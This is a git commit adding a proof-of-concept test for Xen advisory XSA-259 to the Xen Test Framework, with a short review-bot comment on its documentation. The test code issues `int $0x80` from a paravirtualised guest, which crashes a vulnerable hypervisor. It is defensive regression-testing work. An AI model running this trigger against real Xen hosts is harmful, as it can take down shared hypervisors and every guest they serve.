From: Andrew Cooper
Date: Mon, 12 Mar 2018 13:35:23 +0000 (+0000)
Subject: XSA-259 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=c603b6b3b13f3e3eca7c62d447994402c25cdc9d;p=xtf.git
XSA-259 PoC
Signed-off-by: Andrew Cooper
---
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 4831d15..8b8325d 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -114,6 +114,8 @@ guest breakout.
 @subpage test-xsa-255 - grant table v2 -> v1 transition may crash Xen.
+@subpage test-xsa-259 - x86: PV guest may crash Xen with XPTI.
+
 @section index-utility Utilities
diff --git a/tests/xsa-259/Makefile b/tests/xsa-259/Makefile
new file mode 100644
index 0000000..bbfd662
--- /dev/null
+++ b/tests/xsa-259/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME := xsa-259
+CATEGORY := xsa
+TEST-ENVS := pv32pae pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-259/main.c b/tests/xsa-259/main.c
new file mode 100644
index 0000000..2cf0733
--- /dev/null
+++ b/tests/xsa-259/main.c
@@ -0,0 +1,52 @@
+/**
+ * @file tests/xsa-259/main.c
+ * @ref test-xsa-259
+ *
+ * @page test-xsa-259 XSA-259
+ *
+ * Advisory: [XSA-259](http://xenbits.xen.org/xsa/advisory-259.html)
+ *
+ * The Meltdown mitigation work (XPTI) didn't correctly deal with an error
+ * path connecting the `int $0x80` special case handing with general exception
+ * handling, which causes Xen to write 0 to an address near 2^64, and suffer a
+ * fatal pagefault.
+ *
+ * The bug can be triggered by using `int $0x80` before registering a handler
+ * with Xen. If vulnerable, Xen will crash.
+ *
+ * @see tests/xsa-259/main.c
+ */
+#include 
+
+const char test_title[] = "XSA-259 PoC";
+
+void test_main(void)
+{
+ exinfo_t fault = 0;
+
+ asm volatile ("1: int $0x80; 2:"
+ _ASM_EXTABLE_HANDLER(1b, 2b, ex_record_fault_eax)
+ : "+a" (fault)
+ : "X" (ex_record_fault_eax));
+
+ /*
+ * If Xen is vulnerable, it should have crashed. If Xen is not
+ * vulnerable, we should have got #GP[0x80|IDT] from the attempt to use a
+ * misconfigured IDT entry.
+ */
+ if ( fault != EXINFO_SYM(GP, (0x80 << 3) | X86_EC_IDT) )
+ return xtf_error("Error: Unexpected fault %#x, %pe\n",
+ fault, _p(fault));
+
+ xtf_success("Success: Not vulnerable to XSA-259\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
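Review bot: The `"X" (ex_record_fault_eax)` input operand in test_main's asm statement is never used by the asm template, and nothing in the hunk says why it is there, so a later reader may be tempted to drop it; a one-line comment on that operand would prevent that, e.g. `/* Input operand only so the handler symbol stays referenced for the extable entry; the template itself does not use it. */` — that appears to be the intent, but confirm the wording against the _ASM_EXTABLE_HANDLER definition. The file header comment also has a typo: `special case handing` should read `special case handling`. Both points are documentation only; the check itself, expecting #GP with error code `(0x80 << 3) | X86_EC_IDT` on a patched Xen, matches the explanation given in the comment directly above it.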